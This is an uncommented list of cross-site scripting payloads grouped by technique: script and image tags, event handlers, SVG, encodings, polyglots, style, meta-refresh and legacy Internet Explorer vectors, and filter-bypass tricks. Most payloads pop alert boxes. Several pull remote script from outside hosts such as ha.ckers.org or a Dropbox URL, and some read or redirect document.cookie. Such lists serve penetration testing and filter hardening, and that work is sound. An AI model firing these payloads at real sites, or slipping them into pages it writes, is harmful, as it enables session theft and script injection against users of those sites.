# XSS (Cross-Site Scripting) Payloads

# Basic XSS
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(123)</script>
<script>alert("XSS")</script>
<script>alert("XSS");</script>
<script>alert("hellox worldss");</script>
<script>alert("hellox worldss")</script>
<script>alert(/XSS")</script>
<script>alert(/XSS/)</script>
<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>
<script>alert(window.origin)</script>
<script>alert(0%0)</script>
<script>alert(document.location)</script>
<SCRIPT>alert('XSS');</SCRIPT>
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
</script><script>alert(1)</script>

# Case variation bypass
<ScRipT>alert("XSS");</ScRipT>
<ScRiPt>alert(1)</sCriPt>
<scr<script>ipt>alert(1)</scr</script>ipt>
foo<script>alert(1)</script>
foo<script>alert(document.cookie)</script>

# Inline JavaScript XSS
'; alert(1);
')alert(1);//
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'; alert(document.cookie); var foo='
foo\'; alert(document.cookie);//';
\";alert('XSS');//
\\";alert('XSS');//

# IMG tag XSS
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert(1)>
<img src=xss onerror=alert(1)>
<img src=javascript:alert('XSS')>
<img src="javascript:alert('XSS')">
<img src=""javascript:alert('XSS');"">
<img src="javascript:alert(&quot;XSS&quot;)">
<img src=javascript:alert(&quot;XSS&quot;)>
<img src="jAVasCrIPt:alert('XSS')">
<IMG SRC=jAVasCrIPt:alert('XSS')>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<img src="xss" onerror="alert(1)">
<img src="x" onerror="alert(String.fromCharCode(88,83,83))">
<img/src="x"/onerror=alert(1)>
<img src=`%00` onerror=this.onerror=confirm(1)
<img src=`%00`&NewLine; onerror=alert(1)&NewLine;
<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
<img/src=@&#32;&#13; onerror = prompt('&#49;')
<img src=`xx:xx`onerror=alert(1)>
<img src="/" =_=" title="onerror='prompt(1)'">
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="javascript:alert('XSS')"
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascrscriptipt:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<img src ?itworksonchrome?\/onerror = alert(1)
<img src=asdf onerror=alert(document.cookie)>
"><img src=x onerror=window.open('https://www.google.com/');>
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

# SVG XSS
<svg/onload=alert('XSS')>
<svg onload=alert(1)>
<svg><script>alert('XSS')</script></svg>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<svg><style>{font-family:'<iframe/onload=confirm(1)>'}
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<svg><script ?>alert(1)
<svg><script>//&NewLine;confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
<svg xmlns="#"><script>alert(1)</script></svg>
<svg onload="javascript:alert(123)" xmlns="#"></svg>
<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
<svg contentScriptType=text/vbs><script>MsgBox+1
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
&#34;&#62;<svg><style>{-o-link-source:'<body/onload=confirm(1)>'}

# Body tag XSS
<body onload=alert('XSS')>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<BODY ONLOAD=alert('hellox worldss')>
<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<body/onload=&lt;!--&gt;&#10alert(1)>
<h1><font color=blue>hellox worldss</h1>

# Input tag XSS
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
<input/onfocus=alert(1)/autofocus>
<input onfocus=write(XSS) autofocus>
<input onblur=write(XSS) autofocus><input autofocus>
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<input value=<><iframe/src=javascript:confirm(1)
&#00;</form><input type="date" onfocus="alert(1)">

# Event handler XSS
<div onmouseover=alert(1)>test</div>
<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
<div/onmouseover='alert(1)'> style="x:">
<button onclick=alert(1)>click</button>
<a href="#" onmouseover=alert(1)>link</a>
<var onmouseover="prompt(1)">On Mouse Over</var>
<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

# Encoded XSS
&#60;script&#62;alert('XSS')&#60;/script&#62;
\x3cscript\x3ealert('XSS')\x3c/script\x3e
<script>alert(String.fromCharCode(88,83,83))</script>
\u003cscript\u003ealert('XSS')\u003c/script\u003e
&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
&lt;SCRIPT&gt;alert(/XSS/.source)&lt;/SCRIPT&gt;
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;
&lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"&gt;
&lt;BODY BACKGROUND=\"javascript:alert('XSS')\"&gt;
&lt;BODY ONLOAD=alert('XSS')&gt;
&lt;IMG DYNSRC=\"javascript:alert('XSS')\"&gt;
&lt;IMG LOWSRC=\"javascript:alert('XSS')\"&gt;
&lt;BGSOUND SRC=\"javascript:alert('XSS');\"&gt;
&lt;BR SIZE=\"&{alert('XSS')}\"&gt;
žscriptualert(EXSSE)ž/scriptu
%253cscript%253ealert(1)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
"><ScRiPt>alert(document.cookie)</script>
"><<script>alert(document.cookie);//<</script>
%22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-

# JavaScript protocol
<a href="javascript:alert('XSS')">click</a>
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<a href="javascript:alert(1)">
<a href=javascript:alert&lpar;document&period;cookie&rpar;>Click Here</a>
<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
<a href="javascript:&#13; javascript:prompt(1)"><input type="X">
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>
<form><a href="javascript:\u0061lert&#x28;1&#x29;">X
<iframe src="javascript:alert('XSS')">
<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
<iframe 00="" src="&Tab;javascript:prompt(1)&Tab;">
<object data="javascript:alert('XSS')">
<object data="javascript&colon;\u0061&#x6C;&#101%72t(1)">
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<iframe/%00/ src=javaSCRIPT&colon;alert(1)
<iframe src=http://ha.ckers.org/scriptlet.html <
<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<iframe xmlns="#" src="javascript:alert(1)"></iframe>
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
&lt;iframe src=http://ha.ckers.org/scriptlet.html&gt;
&lt;IFRAME SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

# DOM-based XSS
<script>document.write('<img src=x onerror=alert(1)>')</script>
<script>eval(location.hash.substr(1))</script>
<script>document.location=document.cookie</script>
javascript:alert("hellox worldss")

# Filter bypass
<scr<script>ipt>alert(1)</scr</script>ipt>
<ScRiPt>alert(1)</sCrIpT>
<script>alert(1)<!--
<script>alert(1)//
<script>/**/alert(1)</script>
<script>al\u0065rt(1)</script>
<svg><script>alert&#40;1&#41;</script>
<script ^__^>alert(String.fromCharCode(49))</script ^__^>
<script ~~~>alert(0%0)</script ~~~>
<script x> alert(1) </script 1=2>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<ScRiPt 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
<script>+-+-1-+-+alert(1)</script>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script>({0:#0=alert/#0#/#0#(0)})</script>
<script>({0:#0=alert/#0#/#0#(123)})</script>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

# Polyglot XSS
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
'';!--"<XSS>=&{()}

# Attribute-based XSS
"><script>alert(1)</script>
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
'><script>alert(1)</script>
"><img src=x onerror=alert(1)>
'><img src=x onerror=alert(1)>
"&gt;<script>alert("XSS")</script>

# Template injection XSS
{{alert(1)}}
${alert(1)}
<%= alert(1) %>
{alert(1)}

# Form-based XSS
<form><button formaction=javascript&colon;alert(1)>CLICKME
<form><button formaction="javascript:alert(123)">crosssitespt
<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
<form><button formaction="javascript:alert(XSS)">lol
<form><isindex formaction="javascript&colon;confirm(1)"
//|\\ <form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//

# Style-based XSS
<style><img src="</style><img src=x onerror=alert(XSS)//">
<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
<div style="font-family:'foo&#10;;color:red;';">LOL
LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert('XSS'));">
<div/style="width:expression(confirm(1))">X</div> {IE7}
<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(\"XSS\")';&lt;/STYLE&gt;
&lt;IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\"&gt;
&lt;XSS STYLE=\"xss:expression(alert('XSS'))\"&gt;
&lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt;
&lt;STYLE&gt;.XSS{background-image:url(\"javascript:alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
&lt;STYLE type=\"text/css\"&gt;BODY{background:url(\"javascript:alert('XSS')\")}&lt;/STYLE&gt;
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>

# Meta refresh XSS
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"&gt;
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"

# Object/Embed XSS
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="javascript:alert(1)">
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
&lt;EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
&lt;EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;

# Video/Audio XSS
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>

# Frameset XSS
<frameset onload=alert(123)>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript:alert('XSS');\"&gt;&lt;/FRAMESET&gt;

# Table XSS
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
&lt;TABLE BACKGROUND=\"javascript:alert('XSS')\"&gt;
&lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript:alert('XSS')\"&gt;

# Script source XSS
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<script src="data:text/javascript,alert(1)"></script>
<script src="#">{alert(1)}</script>;1
<SCRIPT SRC=//ha.ckers.org/.js>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
<script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
&lt;SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"&gt;&lt;/SCRIPT&gt;
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
<script src="data:text/javascript,alert(1)"></script>
 <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>

# Script attributes XSS
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
&lt;SCRIPT a=\"&gt;\" SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT =\"&gt;\" SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=\"&gt;\" '' SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT \"a='&gt;'\" SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=`&gt;` SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;

# Document write XSS
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
&lt;SCRIPT&gt;document.write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;document.&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http://ha.ckers.org/xss.js\"&gt;&lt;/SCRIPT&gt;
</script><script >alert(document.cookie)</script>

# Comment-based bypass XSS
<!--<img src="--><img src=x onerror=alert(XSS)//">
<!--<img src="--><img src=x onerror=alert(123)//">
<![><img src="]><img src=x onerror=alert(XSS)//">
<--`<img/src=` onerror=alert(1)> --!>

# Link/Base XSS
&lt;LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"&gt;
&lt;LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\"&gt;
&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;
&lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet\"&gt;
&lt;STYLE&gt;BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}&lt;/STYLE&gt;
&lt;XSS STYLE=\"behavior: url(xss.htc);\"&gt;
&lt;STYLE&gt;li {list-style-image: url(\"javascript:alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
&lt;BASE HREF=\"javascript:alert('XSS');//\"&gt;
&lt;LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"&gt;&lt;/LAYER&gt;

# VBScript XSS
&lt;IMG SRC='vbscript:msgbox(\"XSS\")'&gt;
&lt;IMG SRC=\"mocha:[code]\"&gt;
&lt;IMG SRC=\"livescript:[code]\"&gt;

# Plaintext XSS
</plaintext\></|\><plaintext/onmouseover=prompt(1)

# Span/Div XSS
<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN

# Math XSS
<math><a xlink:href="//jsfiddle.net/t846h/">click

# Conditional comment XSS
&lt;!--[if gte IE 4]&gt;
&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
&lt;![endif]--&gt;

# Special protocols
http://www.google<script .com>alert(document.location)</script
http://www.<script>alert(1)</script .com

# Whitespace/special character bypass
<BODY onload!#$%&()*~+-_.,;?@[/|\]^`=alert("XSS")>
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

# Null byte bypass
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

# Character encoding bypass
<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&lt;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C

# Textarea/Noscript/Title bypass
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
¼script¾alert(¢XSS¢)¼/script¾
<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>

# Microsoft-specific XSS
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
&lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"&gt;&lt;/OBJECT&gt;
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;
&lt;HTML xmlns:xss&gt;&lt;?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[<IMG SRC=\"javas]]&gt;&lt;![CDATA[cript:alert('XSS');\"&gt;]]&gt;
&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
&lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript:alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt;
